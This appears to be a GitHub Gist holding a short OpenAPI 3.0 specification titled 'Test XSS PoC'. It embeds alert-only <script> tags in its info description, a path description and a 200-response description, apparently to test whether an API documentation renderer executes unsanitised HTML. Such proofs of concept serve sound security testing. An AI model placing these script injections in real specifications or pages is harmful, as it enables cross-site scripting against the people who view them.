Created
June 24, 2025 09:07
-
-
Save RudraDelete26/839d2e33a36e438321300f069268dcd3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
openapi: 3.0.0 | |
info: | |
title: Test XSS PoC | |
description: | | |
<script>alert("✅ DOM XSS WORKED - Rudra PoC");</script> | |
version: 1.0.0 | |
paths: | |
/test: | |
get: | |
summary: Basic Test | |
description: | | |
<script>alert("🔥 XSS from path description");</script> | |
responses: | |
'200': | |
description: | | |
<script>alert("💀 XSS from 200 OK Response");</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment